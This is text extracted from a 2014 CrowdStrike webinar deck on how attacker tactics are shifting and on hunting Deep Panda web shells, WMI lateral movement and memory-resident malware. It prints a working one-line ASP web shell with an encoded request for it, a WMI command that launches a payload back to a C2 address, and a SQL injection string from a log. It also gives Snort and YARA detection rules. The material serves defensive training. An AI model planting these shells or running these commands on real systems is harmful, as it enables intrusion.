Going Beyond the Indicator

Agenda
• Introductions
• Typical Attacker TTPs
• Case Studies
• New Tactics Explained
• Hunting and Detecting
• Best Practice Preparations
• Resources / Q & A
© 2014 CrowdStrike, Inc. All rights reserved. 2
@CROWDSTRIKE | #CROWDCASTS

Today’s Speakers
Stroz Friedberg, AT&T, The Aerospace
Corporation, CERT/CC
Incident Response, Forensic Analysis, and
Risk Assessments
DANNY LUNGSTROM
© 2014 CrowdStrike, Inc. All rights reserved. 3
PRIOR TO CROWDSTRIKE
8+ YEARS
@CROWDSTRIKE | #CROWDCASTS
LinkedIn: Danny Lungstrom
CONNECT

Today’s Speakers
KPMG LLP. (Information Protection and
Business Resiliency)
Performing Security Assessments, Auditing
and Remediating Environments, and
Developing Security Programs/Strategies
JUSTIN J. WEISSERT
© 2014 CrowdStrike, Inc. All rights reserved. 4
PRIOR TO CROWDSTRIKE
CONNECT
7+ YEARS
@CROWDSTRIKE | #CROWDCASTS
LinkedIn: Justin Weissert
Twitter: @JJWeissert

Today’s Speakers
RSA NetWitness, Mandiant,
Beckman Coulter
LinkedIn: Ryan Jafarkhani
Twitter: @rj_jafar
Auditing, Conducting Incident Response
Investigations, Network Forensics, Computer
Forensics and Malware Analysis
© 2014 CrowdStrike, Inc. All rights reserved. 5
PRIOR TO CROWDSTRIKE
CONNECT
5+ YEARS
@CROWDSTRIKE | #CROWDCASTS
RYAN JAFARKHANI

6
WHO IS
?
CrowdStrike is a global provider of security technologies and services focused on
identifying advanced threats and targeted attacks. Using big-data technologies,
CrowdStrike’s next-generation threat protection platform enables enterprises to identify
unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide
attribution.
© 2014 CrowdStrike, Inc. All rights reserved.

7
WHAT DO WE DO?
TECHNOLOGY
ENDPOINT THREAT DETECTION & RESPONSE
CONTINUOUS ENDPOINT ACTIVITY MONITORING & REAL-TIME FORENSICS
SERVICES
PROACTIVE & INCIDENT RESPONSE SERVICES
INTELLIGENCE
CYBER THREAT INTELLIGENCE & ATTRIBUTION
© 2014 CrowdStrike, Inc. All rights reserved.

About CrowdStrike Services
Incident Response Investigations
Proactive Threat Assessments
IR Program Development
Average of Ten Years IR Industry Experience
Backgrounds in IR Consulting, Government,
and Defense
Specialists in Broad Range of Technologies
Finance, Technology, Manufacturing, Retail,
Healthcare, Telecommunications, Oil & Gas,
Entertainment
© 2014 CrowdStrike, Inc. All rights reserved. 8
COMPREHENSIVE OFFERINGS
INDUSTRY VETERANS
VARIETY OF CUSTOMER VERTICALS
@CROWDSTRIKE | #CROWDCASTS
WHO
ADVERSARY
WHY
INTENT
WHAT
MALWARE
INDUSTRY

And there are a lot of adversaries
© 2014 CrowdStrike, Inc. All rights reserved. 9
Adversary groups our Intelligence team tracks…
Commercial, Government, Non-profit
Financial, Technology, Communications
Defense & Aerospace, Industrial Engineering, NGOs
Financial Sector
Dissident groups
Electronics & Communications
G20, NGOs, Dissident Groups
CHINA IRAN
Energy Companies
INDIA
Government, Legal, Financial,
Media, Telecom
RUSSIA
Oil and Gas Companies
Financial Sector
Crime Syndicates
@CROWDSTRIKE | #CROWDCASTS

10
TYPICAL ATTACKER TTPS
2014 Crowdstrike, Inc. All rights reserved.

Typical - Attacker TTPs
• Initial Attack Vector
• Malware
– Persistence Mechanism
– Command & Control
– Functionality
• Lateral Movement
• Data Extraction/Theft
2014 CrowdStrike, Inc. All rights reserved. 11

Shift in Attacker TTPs
2014 CrowdStrike, Inc. All rights reserved. 12
Attacker TTP Historical Trends Current Trends
Initial Attack
Vector
Spearphish and Vulnerable External
Facing Applications (Most Common)
No Significant Change
Malware –
Persistence
Mechanism
Installed as Service, Run Key, Etc. No Persistence
Malware –
Command &
Control
Beacon to Malicious IP or Domain No Standard Beacon Activity
Malware –
Functionality
Simple – Provides Shell or Basic
Upload/Download Functionality
Robust – Includes All Required
Functionality and Commands
Malware –
Location
Written to Disk Memory-Resident

Shift in Attacker TTPs (Cont.)
2014 CrowdStrike, Inc. All rights reserved. 13
Attacker TTP Historical Trends Current Trends
Lateral
Movement
Net Use, RDP or Utilities (e.g. PSExec) WMI, Service Accounts
Obfuscation Timestomp Standard Times (Windows
API)
Timestomp Both Standard and File
Times (Windows API and MFT)
Data Extraction Compress Data and Send to
Compromised Host Provider
No Significant Change
Last Hop
Communication
Source Country IPs (Most Often
Chinese, Russian, Iranian)
North American IPs, Anonymous
VPN Solutions, Cloud

Catalyst for Change
2014 CrowdStrike, Inc. All rights reserved. 14
• Shifts in Tactics
– Increased Intel Sharing
• Whitepapers
• Blog Posts
• Conference Demos
• VirusTotal
• US Government JIB (Joint
Indicator Bulletin)
Pros Cons
• Increased awareness /
detection for public
companies
• Decreased Intel gap for
smaller organizations
• Increased costs for
attackers to change TTPs
• Indicators become less
effective as attackers shift
TTPs (e.g. new malware,
C2 infrastructure)
• Attacks become more
advanced to avoid current
methods of detection
• Reduces visibility into
what attacker is doing and/
or targeting

15
CASE STUDIES
2014 Crowdstrike, Inc. All rights reserved.

Case Studies - Background
• Company #1
– Company compromised in 2012 using historical TTPs
– Partial Remediation February 2013
– Re-Compromise March 2013 with new TTPs
• Company #2
– Compromised March 2013
– New TTPs from Company 1 re-compromise were observed
© 2014 CrowdStrike, Inc. All rights reserved. 16

Timeline
© 2014 CrowdStrike, Inc. All rights reserved. 17
@CROWDSTRIKE | #CROWDCASTS
February 2013 March 2013 April 2013
Company #1
Investigation
Commences
Traditional
Tactics
Intel Community
Shares
TTPs Shared
Widely
Company #1
Partial
Remediation
Logging &
Monitoring Old
Tactics
Company #2
Investigation
Commences
New Tactics
Company #1
Re-compromised
New Tactics

18
NEW TACTICS EXPLAINED
2014 Crowdstrike, Inc. All rights reserved.

Deep Panda – Simple Web Shell
• 28 byte web shell
• Active Server Page file
– Expected input is VBScript code (encoded as ASCII hex)
• The execute() function executes any VBScript passed to it
– Upload / download files
– Execute arbitrary commands (including WMI)
– Full access to file system
• Controlled by an attacker “thick client”
2014 Crowdstrike, Inc. All rights reserved. 19
<%execute request(chr(42))%>

Deep Panda – Simple Web Shell
2014 Crowdstrike, Inc. All rights reserved. 20
As a simple example of an encoded command, the following
GET request would cause the backdoor to execute the code
Response.Write(“<h1>Hello World</h1>”) and would render
“Hello World” to be printed in the web browser:
http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%6
9%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31
%3E%22%29

Deep Panda – Complex Web Shell
© 2014 CrowdStrike, Inc. All rights reserved. 21
• Ability to impersonate a user (with valid credentials)
• Eight different commands
– File system, SQL server, and Active Directory requests
– Upload / download files
– Compile and execute any C# code

Web Shell Authentication
• Rudimentary (but effective)
authentication for incoming
connections
– Requires the presence of a cookie
named ‘zWiz’
– or HTTP header Keep-Alive = 320
– or language header containing es-
DN (invalid language)
• Prevents identification via search
engine indexing or vulnerability
scanning
2014 Crowdstrike, Inc. All rights reserved. 22

Web Shells – But Why?
• Primary foothold back into
victim organization
• Less reliant on malware
installed on systems,
beaconing to a C2
© 2014 CrowdStrike, Inc. All rights reserved. 23
• Why?
– Low to virtually no detection by antivirus
products
– The absence of command and control
beacon traffic
– Impossible to block known malicious IP
addresses to a web server since adversary
can easily change their source IP address
– Cookie and HTTP header authentication
aware web shells avoid being enumerated
by search engines and restrict access,
further reducing their network footprint

Second Stage Malware
© 2014 CrowdStrike, Inc. All rights reserved. 24
C2
Infrastructure
- Execution using Web Shell
- Lateral Movement
- Data theft
Upload
MalwareAccess
Web Shell
Adversary
Web ServerAnonymous VPN or
Proxy
Why?
No Command and Control Beacon activity
Change IP/Domain on the fly
Runs in memory
Limits forensic artifacts

Lateral Movement
© 2014 CrowdStrike, Inc. All rights reserved. 25
Web Server
System32cmd.exe - c:bad.exe /f wmi /s Host2 /u
Host2Administrator /p ”P@ssW0rd" /m call /q
"Win32_Process" /c Create – CommandLine:C:bad.exe /f
sh /s 59.111.22.222 /p 443"
Host 2
C2
Infrastructure
59.111.22.222
Anonymous VPN or
Proxy
Adversary
Access
Web Shell
Leverage WMI
Custom VB script “PsExec” Utility
4kb script to remotely launch process as a
specified user
Cscript.exe – Username Password Remote
Host Process path
Why WMI?
Evades most typical logging
Shows up as WMI Service
Powerful functionality, built into Windows

26
HUNTING AND DETECTING
2014 Crowdstrike, Inc. All rights reserved.

Go Beyond the Indicator
• New evil requires new approaches for detection
• Look through multiple haystacks for a single needle
– The evil stands out with the right methodology
• Blog series
– Mo’ Shells Mo’ Problems
© 2014 CrowdStrike, Inc. All rights reserved. 27
http://www.crowdstrike.com/blog/

Hunting – WMI Activity
© 2014 CrowdStrike, Inc. All rights reserved. 28
• Windows XP and Server 2003 Had Limited Logging
– %systemroot%system32wbemlogs
• Windows 7 and Server 2008 Do NOT Log
– Help investigators help you – enable ahead of time!
• Wevtutil.exe
sl
Microsoft-­‐Windows-­‐WMI-­‐Activity/Trace
/e:true
– Review WMITracing.log via Event Viewer
• Be Familiar with Your Environment’s Use of WMI

Hunting Web Shells – Identifying Intrusion Points
• Web shells are often one of the earliest stages of malware
• Search for activity on the system near the first known
compromise time
– Successful web scans in logs
– SQL injection
– Dropper malware
– Lateral movement from other compromised systems
– Pages created or modified within the webserver document root
2014 Crowdstrike, Inc. All rights reserved. 29
2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>

Hunting Web Shells – File Stacking
• File stacking is based on
the concept of least
frequency of
occurrence
• Collect files from all of
your webservers and
investigate outliers
– What files do not exist on
other web servers?
– PHP|JSP|ASP|ASPX|CFM
© 2014 CrowdStrike, Inc. All rights reserved. 30

Hunting Web Shells – Web Log Review
• Perform statistical analysis of page requests and search for
outliers
– See exactly when the web shells were in use via the web logs
2014 Crowdstrike, Inc. All rights reserved. 31

Hunting Web Shells – Network Monitoring
• Stack Web Requests from
Network Data
• Leverage Cyber Intelligence
Feeds to Detect Known Web
Shells
– Unique header attributes
– HTML used to produce the shell
© 2014 CrowdStrike, Inc. All rights reserved. 32
alert
tcp
$EXTERNAL_NET
any
-­‐>
$WEB_SERVERS
$HTTP_PORTS
(msg:
"CrowdStrike
Deep
Panda
CSharp
Webshell
Headers";
content:
"Keep-­‐
Alive:
320";
http_raw_header;
content:
"es-­‐
DN";
http_raw_header;
flow:
established,
to_server;
classtype:
trojan-­‐activity;
metadata:
service
http;
sid:
xxx;
rev:
xxx;
)

Hunting – Memory Resident Malware
© 2014 CrowdStrike, Inc. All rights reserved. 33
• “Fileless” Forensics Fun
• Persistence, We Don’t Need No Stinkin’ Persistence
• New Approach to Malware Means New Approach to Forensics
• Hidden, Not Invisible
• What’s Normal and What’s New?
– Get to know your systems
– Image memory, review, rinse and repeat

Hunting with YARA
• YARA signatures can be used
to search your enterprise for
specific patterns on disk and
in memory
2014 Crowdstrike, Inc. All rights reserved. 34
rule CrowdStrike_13091_01 : deep_panda alice RAT
{ meta:
description = "Detection of Mad Hatter .NET RAT"
last_modified = "2013-10-08"
version = "1.1"
in_the_wild = true
copyright = "CrowdStrike, Inc"
report = "CSIT-13091"
strings:
$marker1 = "alice'srabbithole" wide
$marker2 =
"{{"Version":{0},"HostName":"{1}","osVersion":
"{2}","tm":
"{3}","tz":{4}}}" wide
$marker3 = "InstManager.pdb"
$marker4 = "<osVersion>"
$marker5 = "<tm>"
$marker6 = "<tz>"
condition:
uint16(0) == 0x5A4D and uint32(uint32(0x3C)) ==
0x00004550 and
2 of ($marker*) }

CrowdResponse
• Free CrowdStrike Community Tool
• Collect and Analyze Artifacts Across Your Enterprise
• Available Modules
– DirList
– YARA
– PSList
• Many Modules Coming Soon
© 2014 CrowdStrike, Inc. All rights reserved. 35
http://www.crowdstrike.com/community-tools/

36
BEST PRACTICE PREPARATIONS
2014 Crowdstrike, Inc. All rights reserved.

Best Practices
• Proactive Defense of Your Network
– Isolate Critical Assets with Network Segmentation
– Consolidate and Monitor Internet Egress Points
– Implement Centralized Logging
– Patch, Patch, and Patch Again
– Secure Web Applications and Internal Software Projects
– Minimize or Remove Local Admin Privileges
– Implement a Tiered Active Directory Admin Model
– Incorporate Cyber Intelligence Feeds
2014 Crowdstrike, Inc. All rights reserved. 37

CrowdStrike Can Help!
• Services to Consider
– Tabletop Assessments (Yearly at Least)
• Keep your team primed and educated on latest attack vectors
– Next-Gen Penetration Testing
• More than just a cursory glance, take a real-world scenario approach
– Incident Response, Disaster Recovery and Business Continuity Plans
• CrowdStrike knowledge and experience can help you improve/build plans
– Incident Response Services Retainer
• Avoid paperwork related time delays
• CrowdStrike Intelligence Subscription
– Stay Up To Date with Latest Attacker TTPs
2014 CrowdStrike, Inc. All rights reserved. 38

39
CROWDSTRIKE RESOURCES
2014 Crowdstrike, Inc. All rights reserved.

CrowdStrike Global Threat Report
• Adversary activity analysis and
predictions
• Look back at 2013
• Predictive trends for 2014
• Threat actor profiles and TTPs
• Get it on crowdstrike.com
© 2014 CrowdStrike, Inc. All rights reserved. 40

INCIDENT
RESPONSE SERVICES
PROACTIVE
RESPONSE SERVICES
CROWDSTRIKE
SERVICES
PROACTIVE
RESPONSE SERVICES
INCIDENT
RESPONSE SERVICES
CrowdStrike Services
INTELLIGENCETECHNOLOGY
2014 Crowdstrike, Inc. All rights reserved. 41

2014 Crowdstrike, Inc. All rights reserved. 42
PROACTIVE
RESPONSE SERVICES
PROACTIVE
RESPONSE SERVICES
Counter Threat Assessment
IR Program Development
Next-Gen Pen Testing
Tabletop Assessment
InfoSec Capability Maturing Model
Adversary Assessments
INCIDENT
RESPONSE SERVICES
Computer Forensic Analysis
Litigation Support
Expert Witness Testimony
Remediation
Malware Analysis

Government-quality intelligence developed using an
‘all-source model’
Detailed technical and strategic analysis of 50+ adversaries’
capabilities, indicators and tradecraft, attribution and intentions
Customizable feeds and API for indicators of
compromise
Indicators can be integrated into current firewall, IDS/IPS, or
SIEM solutions to provide real-time attribution
Tailored Intelligence feature provides visibility into breaking events
that matter an organization’s brand, infrastructure, and customers
Falcon Intelligence: Threat Intelligence Subscription
2
3
4
1
5
2014 Crowdstrike, Inc. All rights reserved. 43

Falcon Host: Endpoint Threat Detection & Response
Identifies unknown malware & detects zero-day threats
Captures and correlates system events to identify adversary
activity in real-time
Maximum visibility across the full kill chain allows for insight into
past & current attacks
Context-based detection does not rely on signatures or easily
changed IOCs
Intelligence integration provides full attribution to identify context,
motivation, and actor behind an attack
2
3
4
1
5
2014 Crowdstrike, Inc. All rights reserved. 44

Falcon Host: Continuous Endpoint Activity Monitoring
Explore rich execution data collected by the Falcon Host sensors
Dashboards provide an at-a-glance view of recent activity for
investigative purposes
Expert-designed menu of queries provide the ability to proactively
hunt for malicious activity
2
3
1
2014 Crowdstrike, Inc. All rights reserved. 45

© 2014 CrowdStrike, Inc. All rights reserved. 46
Q & A

NEXT
© 2014 CrowdStrike, Inc. All rights reserved. 47
@CROWDSTRIKE | #CROWDCASTS
Topic: Operationalizing Intelligence
Adam Meyers – Director, Intelligence
Elia Zaitsev – Senior Sales Engineer
April 29th | 2PM ET/11AM PT
Q&A